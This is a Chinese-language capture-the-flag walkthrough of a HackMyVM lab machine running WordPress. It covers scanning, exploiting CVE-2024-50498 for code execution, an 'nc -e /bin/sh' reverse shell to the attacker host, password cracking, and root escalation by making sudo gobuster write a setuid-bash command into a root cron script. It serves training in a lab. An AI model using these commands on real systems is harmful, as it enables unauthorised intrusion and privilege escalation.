信息收集
主机发现
shell
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:b0:9b:6b (Unknown)
192.168.56.105 08:00:27:da:56:11 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.157 seconds (118.68 hosts/sec). 3 responded端口扫描
shell
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 07:33 EST
Nmap scan report for 192.168.56.105
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey:
| 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
| 256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: bammmmuwe
|_http-generator: WordPress 6.7.1
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:DA:56:11 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds80端口开了一个http服务。是一个用wordpress搭建的站点。
用wpscan进行一些信息收集
最开始我只进行了wpscan --url http://192.168.56.105 -e u,ap没用使用--plugins-detection aggressive 模式。
对目标进行了好几次的信息收集,但是没有收集到任何漏洞信息
后来使wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive 发现网站存在一个CVE-2024-50498
shell
┌──(root㉿LAPTOP-40PQI58C)-[/mnt/c/Users/legion]
└─# wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.105/ [192.168.56.105]
[+] Started: Mon Feb 24 20:36:52 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.14.2
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.105/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.105/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.105/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.105/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.7.1 identified (Outdated, released on 2024-11-21).
| Found By: Meta Generator (Passive Detection)
| - http://192.168.56.105/, Match: 'WordPress 6.7.1'
| Confirmed By: Rss Generator (Aggressive Detection)
| - http://192.168.56.105/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
| - http://192.168.56.105/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:14:12 <==================================> (109235 / 109235) 100.00% Time: 00:14:12
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.105/wp-content/plugins/akismet/
| Last Updated: 2025-02-14T18:49:00.000Z
| Readme: http://192.168.56.105/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.7
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
[+] feed
| Location: http://192.168.56.105/wp-content/plugins/feed/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/feed/, status: 200
|
| The version could not be determined.
[+] wp-query-console
| Location: http://192.168.56.105/wp-content/plugins/wp-query-console/
| Latest Version: 1.0 (up to date)
| Last Updated: 2018-03-16T16:03:00.000Z
| Readme: http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/wp-query-console/, status: 403
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] ta0
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.56.105/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] welcome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Feb 24 20:51:12 2025
[+] Requests Done: 109276
[+] Cached Requests: 42
[+] Data Sent: 29.237 MB
[+] Data Received: 33.165 MB
[+] Memory used: 478.477 MB
[+] Elapsed time: 00:14:20拿着payload直接打了,页面报错了
执行了phpinfo()页面正常
但是执行其他语句就都是400
我执行了var_dump(1),虽然页面还是400 但是页面返回来了结果
在刚刚的返回的phpinfo()页面看到了禁用的函数
但是用反引号还是能执行命令
弹个shellnc -e /bin/sh 192.168.56.103 7777
拿到了www-data的权限
有一个叫welcome的普通用户。同时WordPress也有一个welcome的用户
上传一个php文件连接数据库读取出WordPress数据库中的用户与密码
刚看到这里的时候,脑子一抽。想着将加密的密码更新为已知的密码。
然后
突然间想起来 这里的welcome的密码可能就是系统用户welcome的密码
就拿了密码 用jhon去爆破
shell
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# john --show hash
?:104567
1 password hash cracked, 0 left然后通过ssh 顺利登录系统
shell
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# ssh welcome@192.168.56.105
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb 24 04:57:16 2025 from 192.168.56.103
$ whoami
welcomesudo -l 看到/usr/bin/gobuster不需要密码就可以使用sudo
shell
$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on listen:
(ALL) NOPASSWD: /usr/bin/gobuster最开始是没有什么思路的
突然间想到可以将 /root/root.txt文件指定为字典
在kali上用python -m http.server起一个http服务
然后执行
shell
sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt很不幸root's flag的名字不叫root.txt
shell
$ sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt
2025/02/24 08:12:20 [!] 1 error occurred:
* Wordlist (-w): File does not exist: /root/root.txt下一个pspy看看
root用户会定时执行/opt/.test.sh
这里突然间想到了
可以用python起一个htpp服务器然后在里面依次放入bin chmod +s bin bash文件夹以及文件
shell
┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm/empty]
└─# tree
.
└── bin
└── chmod +s
└── bin
└── bash
4 directories, 1 file然后创建一个字典文件里面只写bin/chmod +s /bin/bash
shell
$ cat 1
bin/chmod +s /bin/bash然后执行sudo /usr/bin/gobuster -u http://192.168.56.103:8000/ -w /home/welcome/1 -o res
shell
welcome@listen:~$ cat res
/bin/chmod +s /bin/bash (Status: 200)
welcome@listen:~$ 得到的结果是我们想要的
但是多了一个 (Status: 200)
后来我才知道-n参数可以忽略吊响应码
在命令后加一个-n参数后
shell
welcome@listen:~$ cat res
/bin/chmod +s /bin/bash
welcome@listen:~$ 后面没任何东西了
刚好是我们想要的
接下来就是把他加入到/opt/.tets.sh中
执行sudo /usr/bin/gobuster -u "http://192.168.56.103:8000/" -w /home/welcome/1 -o /opt/.test.sh -n
再看/bin/bash的权限,已经加上了s位
shell
welcome@listen:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
welcome@listen:~$ 之后执行 bash -p就是root权限了
shell
welcome@listen:~$ bash -p
bash-5.0# whoami
root
bash-5.0# id
uid=1001(welcome) gid=1001(welcome) euid=0(root) egid=0(root) groups=0(root),1001(welcome)
bash-5.0#